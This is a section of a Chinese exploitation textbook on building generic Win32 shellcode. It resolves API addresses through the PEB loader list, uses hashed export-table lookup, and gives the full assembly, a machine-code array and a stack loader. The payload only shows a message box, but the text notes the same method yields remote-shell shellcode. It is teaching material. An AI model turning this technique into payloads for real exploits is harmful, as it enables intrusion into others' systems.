3.4 开发通用的shellcode
3.4.1 定位API的原理
回顾2.4节和3.2节中的shellcode是怎样调用MessagBoxA和ExitProcess函数的。如果您亲手实验了这些步骤,在使用Dependency Walker计算您的计算机中的API入口地址的时候,可能会发现您的地址和本书实验指导中的地址有所差异。原因有几下几点。
(1)不同的操作系统版本:Windows 2000,Windows XP等会影响动态链接库的加载基址。
(2)不同的补丁版本:很多安全补丁会修改这些动态链接库中的函数,使得不同版本补丁对应的动态链接库的内容有所不同,包括动态链接库文件的大小和导出函数的偏移地址。
由于这些因素,我们手工查出的API地址很可能会在其他计算机上失效。在shellcode中使用静态函数地址来调用API会使exploit的通用性受到很大限制。所以,实际中使用的shellcode必须还要能动态地获得自身所需的API函数地址。
Windows的API是通过动态链接库中的导出函数来实现的,例如,内存操作等函数在kernel32.dll中实现;大量的图形界面相关的API则在user32.dll中实现。Win_32平台下的shellcode使用最广泛的方法,就是通过从进程环境块中找到动态链接库的导出表,并搜索出所需的API地址,然后逐一调用。
所有win_32程序都会加载ntdll.dll和kernel32.dll这两个最基础的动态链接库。如果想要在win_32平台下定位kernel32.dll中的 API地址,可以采用如下方法。
(1)首先通过段选择字FS在内存中找到当前的线程环境块TEB。
(2)线程环境块偏移位置为0x30的地方存放着指向进程环境块PEB的指针。
(3)进程环境块中偏移位置为0x0C的地方存放着指向PEB_LDR_DATA结构体的指针,其中,存放着已经被进程装载的动态链接库的信息。
(4)PEB_LDR_DATA结构体偏移位置为0x1C的地方存放着指向模块初始化链表的头指针InInitializationOrderModuleList。
(5)模块初始化链表InInitializationOrderModuleList中按顺序存放着PE装入运行时初始化模块的信息,第一个链表结点是ntdll.dll,第二个链表结点就是kernel32.dll。
(6)找到属于kernel32.dll的结点后,在其基础上再偏移0x08就是kernel32.dll在内存中的加载基地址。
(7)从kernel32.dll的加载基址算起,偏移0x3C的地方就是其PE头。
(8)PE头偏移0x78的地方存放着指向函数导出表的指针。
(9)至此,我们可以按如下方式在函数导出表中算出所需函数的入口地址,如图3.4.1所示。
·导出表偏移0x1C处的指针指向存储导出函数偏移地址(RVA)的列表。
·导出表偏移0x20处的指针指向存储导出函数函数名的列表。
·函数的RVA地址和名字按照顺序存放在上述两个列表中,我们可以在名称列表中定位到所需的函数是第几个,然后在地址列表中找到对应的RVA。
·获得RVA后,再加上前边已经得到的动态链接库的加载基址,就获得了所需API此刻在内存中的虚拟地址,这个地址就是我们最终在shellcode中调用时需要的地址。
按照上面的方法,我们已经可以获得kernel32.dll中的任意函数。类似地,我们已经具备了定位ws2_32.dll中的winsock函数来编写一个能够获得远程shell的真正的shellcode了。
其实,在摸透了kernel32.dll中的所有导出函数之后,结合使用其中的两个函数LoadLibrary()和GetProcAddress(),有时可以让定位所需其他API的工作变得更加容易。
图3.4.1 在shellcode中动态定位API的原理
本节实验将用上述定位API的方法把弹出消息框的shellcode进一步完善,使其能够适应任意win_32平台,不受操作系统版本和补丁版本的限制。
3.4.2 shellcode的加载与调试
shellcode的最常见形式就是用转移字符把机器码存在一个字符数组中,例如,前边我们弹出消息框并能正常退出程序的shellcode就可以存成下述形式。
char box_popup[]= "\x66\x81\xEC\x40\x04" // SUB SP,440 "\x33\xDB" // XOR EBX,EBX "\x53" // PUSH EBX "\x68\x77\x65\x73\x74" // PUSH 74736577 "\x68\x66\x61\x69\x6C" // PUSH 6C696166 "\x8B\xC4" // MOV EAX,ESP "\x53" // PUSH EBX "\x50" // PUSH EAX "\x50" // PUSH EAX "\x53" // PUSH EBX "\xB8\xEA\x04\xD8\x77" // MOV EAX,user32.MessageBoxA "\xFF\xD0" // CALL EAX "\x53" // PUSH EBX ;/ExitCode "\xB8\xDA\xCD\x81\x7C" // MOV EAX,kernel32.ExitProcess "\xFF\xD0"; // CALL EAX ;\ExitProcess
如果在互联网上搜集常用的shellcode,一般得到的也是类似的存于字符数组的机器码。我们本节实验中将对上述代码进行完善,加入自动获取API入口地址的功能,最终得到的也是类似这种形式的机器代码。
虽然这种形式的shellcode可以在C语言中轻易地布置进内存的目标区域,但是如果出了问题,往往难于调试。所以,在我们开始着手改造shellcode之前,先看看相关的调试环境。
由于shellcode需要漏洞程序已经初始化好了的进程空间和资源等,故往往不能单独运行。为了能在实际运行中调试这样的机器码,我们可以使用这样一段简单的代码来装载shellcode。
char shellcode[]="\x66\x81\xEC\x40\x04\x33\xDB……";//欲调试的十六
//进制机器码"
void main()
{
__asm
{
lea eax, shellcode
push eax
ret
}
}
ret指令会将push进去的shellcode在栈中的起始地址弹给EIP,让处理器跳转到栈区去执行shellcode。我们可以用这段装载程序运行搜集到的shellcode,并调试之。若搜集到的shellcode不能满足需求,也可以在调试的基础上稍作修改,为它增加新功能。
3.4.3 动态定位API地址的shellcode
下面我们将给shellcode加入自动定位API的功能。为了实现弹出消息框并显示“failwest”的功能,需要使用如下API函数。
(1)MessageBoxA 位于user32.dll中,用于弹出消息框。
(2)ExitProcess 位于kernel32.dll中,用于正常退出程序。
(3)LoadLibraryA 位于kernel32.dll中。并不是所有的程序都会装载user32.dll,所以在我们调用MessageBoxA之前,应该先使用LoadLibrary(“user32.dll”)装载其所属的动态链接库。
通过前面介绍的win_32平台下搜索API地址的办法,我们可以从FS所指的线程环境块开始,一直追溯到动态链接库的函数名导出表,在其中搜索出所需的API函数是第几个,然后在函数偏移地址(RVA)导出表中找到这个地址。
由于shellcode最终是要放进缓冲区的,为了让shellcode更加通用,能被大多数缓冲区容纳,我们总是希望shellcode尽可能短。因此,在函数名导出表中搜索函数名的时候,一般情况下并不会用“MessageBoxA”这么长的字符串去进行直接比较。
通常情况下,我们会对所需的API函数名进行hash运算,在搜索导出表时对当前遇到的函数名也进行同样的hash,这样只要比较hash所得的摘要(digest)就能判定是不是我们所需的API了。虽然这种搜索方法需要引入额外的hash算法,但是可以节省出存储函数名字符串的代码。
提示:本书中所说的hash指的是hash算法,是一个运算过程。经过hash后得到的值将被称做摘要,即digest,请读者注意这种叙述方式。
本节实验中所用hash函数的C代码如下。
#include <stdio.h>
#include <windows.h>
DWORD GetHash(char *fun_name)
{
DWORD digest=0;
while(*fun_name)
{
digest=((digest<<25)|(digest>>7)); //循环右移7位
digest+= *fun_name ; //累加
fun_name++;
}
return digest;
}
main()
{
DWORD hash;
hash= GetHash("AddAtomA");
printf("result of hash is %.8x\n",hash);
}
如上述代码,我们将把字符串中的字符逐一取出,把ASCII码从单字节转换成四字节的双字(DWORD),循环右移7位之后再进行累积。
代码中只比较经过hash运算的函数名摘要,也就是说,不论API函数名多么长,我们只需要存一个双字就行。而上述hash算法只需要用ror和add两条指令就能实现。
题外话:在下一节中,我们将讨论怎样精简shellcode的长度,其中会详细讨论按照什么标准来选取hash算法。实际上您会发现hash后的摘要并不一定是一个双字(32bit),精心构造的hash算法可以让一个字节(8bit)的摘要也满足要求。
API函数及hash后的摘要如表3-4-1所示。
表3-4-1 API函数及hash后的摘要
在将hash压入栈中之前,注意先将增量标志DF清零。因为当shellcode是利用异常处理机制而植入的时候,往往会产生标志位的变化,使shellcode中的字串处理方向发生变化而产生错误(如指令LODSD)。如果您在堆溢出利用中发现原本身经百战的shellcode在运行时出错,很可能就是这个原因。总之,一个字节的指令可以大大增加shellcode的通用性。
现在可以将这些hash结果压入栈中,并用一个寄存器标识位置,以备后面搜索API函数时使用。
;store hash push 0x1e380a6a ;hash of MessageBoxA push 0x4fd18963 ;hash of ExitProcess push 0x0c917432 ;hash of LoadLibraryA mov esi,esp ;esi = addr of first function hash lea edi,[esi-0xc] ;edi = addr to start writing function
然后我们需要抬高栈顶,保护shellcode不被入栈数据破坏。
;make some stack space xor ebx,ebx mov bh, 0x04 sub esp, ebx
按照图3.4.1所示,定位kernel32.dll的代码如下。
;find base addr of kernel32.dll mov ebx, fs:[edx + 0x30] ;ebx = address of PEB mov ecx, [ebx + 0x0c] ;ecx = pointer to loader data mov ecx, [ecx + 0x1c] ;ecx = first entry in initialisation ;order list mov ecx, [ecx] ;ecx = second entry in list;(kernel32.dll) mov ebp, [ecx + 0x08] ;ebp = base address of kernel32.dll
在导入表中搜索API的逻辑可以设计如图3.4.2所示。
图3.4.2 定位API的流程图
最终的代码实现如下。
int main()
{
_asm{
CLD ;clear flag DF
;store hash
push 0x1e380a6a ;hash of MessageBoxA
push 0x4fd18963 ;hash of ExitProcess
push 0x0c917432 ;hash of LoadLibraryA
mov esi,esp ;esi = addr of first function hash
lea edi,[esi-0xc] ;edi = addr to start writing function
;make some stack space
xor ebx,ebx
mov bh, 0x04
sub esp, ebx
;push a pointer to "user32" onto stack
mov bx, 0x3233 ;rest of ebx is null
push ebx
push 0x72657375
push esp
xor edx,edx
;find base addr of kernel32.dll
mov ebx, fs:[edx + 0x30] ;ebx = address of PEB
mov ecx, [ebx + 0x0c] ;ecx = pointer to loader data
mov ecx, [ecx + 0x1c] ;ecx = first entry in initialization
;order list
mov ecx, [ecx] ;ecx = second entry in list
;(kernel32.dll)
mov ebp, [ecx + 0x08] ;ebp = base address of kernel32.dll
find_lib_functions:
lodsd ;load next hash into al and increment esi cmp eax, 0x1e380a6a ;hash of MessageBoxA - trigger
;LoadLibrary("user32")
jne find_functions
xchg eax, ebp ;save current hash
call [edi - 0x8] ;LoadLibraryA
xchg eax, ebp ;restore current hash, and update ebp
;with base address of user32.dll
find_functions:
pushad ;preserve registers
mov eax, [ebp + 0x3c] ;eax = start of PE header
mov ecx, [ebp + eax + 0x78] ;ecx = relative offset of export table
add ecx, ebp ;ecx = absolute addr of export table
mov ebx, [ecx + 0x20] ;ebx = relative offset of names table
add ebx, ebp ;ebx = absolute addr of names table
xor edi, edi ;edi will count through the functions
next_function_loop:
inc edi ;increment function counter
mov esi, [ebx + edi * 4] ;esi = relative offset of current
;function name
add esi, ebp ;esi = absolute addr of current
;function name
cdq ;dl will hold hash (we know eax is
;small)
hash_loop:
movsx eax, byte ptr[esi]
cmp al,ah
jz compare_hash
ror edx,7
add edx,eax
inc esi
jmp hash_loop
compare_hash:
cmp edx, [esp + 0x1c] ;compare to the requested hash (saved on;stack from pushad)
jnz next_function_loop
mov ebx, [ecx + 0x24] ;ebx = relative offset of ordinals
;table
add ebx, ebp ;ebx = absolute addr of ordinals
;table
mov di, [ebx + 2 * edi] ;di = ordinal number of matched
;function
mov ebx, [ecx + 0x1c] ;ebx = relative offset of address
;table
add ebx, ebp ;ebx = absolute addr of address table
add ebp, [ebx + 4 * edi] ;add to ebp (base addr of module) the
;relative offset of matched function
xchg eax, ebp ;move func addr into eax
pop edi ;edi is last onto stack in pushad
stosd
;write function addr to [edi] and
;increment edi
push edi
popad ;restore registers;loop until we reach end of last hash
cmp eax,0x1e380a6a
jne find_lib_functions
function_call:
xor ebx,ebx
push ebx ;cut string
push 0x74736577
push 0x6C696166 ;push failwest
mov eax,esp ;load address of failwest
push ebx
push eax
push eax
push ebx
call [edi - 0x04] ;call MessageboxA
push ebx
call [edi - 0x08] ;call ExitProcess
nop
nop
nop
nop
}
}
上述汇编代码可以用VC 6.0直接编译运行,并生成PE文件。之后可以用OllyDbg或者IDA等反汇编工具从PE文件的代码节中提取出二进制的机器码如下。
提示:之所以在汇编代码的前后都加上一段nop(0x90),是为了在反汇编工具或调试时非常方便地区分出shellcode的代码。
"\x90"// NOP "\xFC"// CLD "\x68\x6A\x0A\x38\x1E"// PUSH 1E380A6A "\x68\x63\x89\xD1\x4F"// PUSH 4FD18963 "\x68\x32\x74\x91\x0C"// PUSH 0C917432 "\x8B\xF4"// MOV ESI,ESP "\x8D\x7E\xF4"// LEA EDI,DWORD PTR DS:[ESI-C] "\x33\xDB"// XOR EBX,EBX "\xB7\x04"// MOV BH,4 "\x2B\xE3"// SUB ESP,EBX "\x66\xBB\x33\x32"// MOV BX,3233 "\x53"// PUSH EBX "\x68\x75\x73\x65\x72"// PUSH 72657375 "\x54"// PUSH ESP "\x33\xD2"// XOR EDX,EDX "\x64\x8B\x5A\x30"// MOV EBX,DWORD PTR FS:[EDX+30] "\x8B\x4B\x0C"// MOV ECX,DWORD PTR DS:[EBX+C] "\x8B\x49\x1C"// MOV ECX,DWORD PTR DS:[ECX+1C] "\x8B\x09"// MOV ECX,DWORD PTR DS:[ECX] "\x8B\x69\x08"// MOV EBP,DWORD PTR DS:[ECX+8] "\xAD"// LODS DWORD PTR DS:[ESI] "\x3D\x6A\x0A\x38\x1E"// CMP EAX,1E380A6A "\x75\x05"// JNZ SHORT popup_co.00401070 "\x95"// XCHG EAX,EBP "\xFF\x57\xF8"// CALL DWORD PTR DS:[EDI-8] "\x95"// XCHG EAX,EBP "\x60"// PUSHAD "\x8B\x45\x3C"// MOV EAX,DWORD PTR SS:[EBP+3C] "\x8B\x4C\x05\x78"// MOV ECX,DWORD PTR SS:[EBP+EAX+78] "\x03\xCD"// ADD ECX,EBP "\x8B\x59\x20"// MOV EBX,DWORD PTR DS:[ECX+20] "\x03\xDD"// ADD EBX,EBP "\x33\xFF"// XOR EDI,EDI "\x47"// INC EDI "\x8B\x34\xBB"// MOV ESI,DWORD PTR DS:[EBX+EDI*4] "\x03\xF5"// ADD ESI,EBP "\x99"// CDQ "\x0F\xBE\x06"// MOVSX EAX,BYTE PTR DS:[ESI] "\x3A\xC4"// CMP AL,AH "\x74\x08"// JE SHORT popup_co.00401097 "\xC1\xCA\x07"// ROR EDX,7 "\x03\xD0"// ADD EDX,EAX "\x46"// INC ESI "\xEB\xF1"// JMP SHORT popup_co.00401088 "\x3B\x54\x24\x1C"// CMP EDX,DWORD PTR SS:[ESP+1C] "\x75\xE4"// JNZ SHORT popup_co.00401081 "\x8B\x59\x24"// MOV EBX,DWORD PTR DS:[ECX+24] "\x03\xDD"// ADD EBX,EBP "\x66\x8B\x3C\x7B"// MOV DI,WORD PTR DS:[EBX+EDI*2] "\x8B\x59\x1C"// MOV EBX,DWORD PTR DS:[ECX+1C] "\x03\xDD"// ADD EBX,EBP "\x03\x2C\xBB"// ADD EBP,DWORD PTR DS:[EBX+EDI*4] "\x95"// XCHG EAX,EBP "\x5F"// POP EDI "\xAB"// STOS DWORD PTR ES:[EDI] "\x57"// PUSH EDI "\x61"// POPAD "\x3D\x6A\x0A\x38\x1E"// CMP EAX,1E380A6A "\x75\xA9"// JNZ SHORT popup_co.00401063 "\x33\xDB"// XOR EBX,EBX "\x53"// PUSH EBX "\x68\x77\x65\x73\x74"// PUSH 74736577 "\x68\x66\x61\x69\x6C"// PUSH 6C696166 "\x8B\xC4"// MOV EAX,ESP "\x53"// PUSH EBX "\x50"// PUSH EAX "\x50"// PUSH EAX "\x53"// PUSH EBX "\xFF\x57\xFC"// CALL DWORD PTR DS:[EDI-4] "\x53"// PUSH EBX "\xFF\x57\xF8";// CALL DWORD PTR DS:[EDI-8]
上述这种保存在字符数组中的shellcode已经可以轻易地在exploit程序中使用了,也可以用前边的shellcode装载程序单独加载运行。
char popup_general[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8";
void main()
{
__asm
{
lea eax, popup_general
push eax
ret
}
}
这样,一段考虑了跨平台、健壮性、稳定性、通用性等各方面因素的高质量shellcode就生成了。本书后面章节将在实验中反复使用这段shellcode。经过反复的实验,这段shellcode在各种溢出利用场景下都表现出色。
通过本节的介绍,可以看出即使是经验丰富的汇编程序员,想要写出高质量的shellcode也得着实花一翻工夫。事实上,若非真的有特殊需要,即使是经验丰富的hacker也不会总是自己编写shellcode。大多数情况下,从Internet上可以得到许多经典的shellcode。另外MetaSploit通用漏洞测试架构3.0下的payload库中,目前已经包含了包括绑定端口、网马downloader、远程shell、任意命令执行等在内的104种不同功能的经典shellcode。通过简单的参数配置,可以轻易导出C语言格式、Perl语言格式、ruby语言格式、原始十六进制格式等形式的shellcode。我们会在后面章节中专门介绍MataSploit的使用和开发。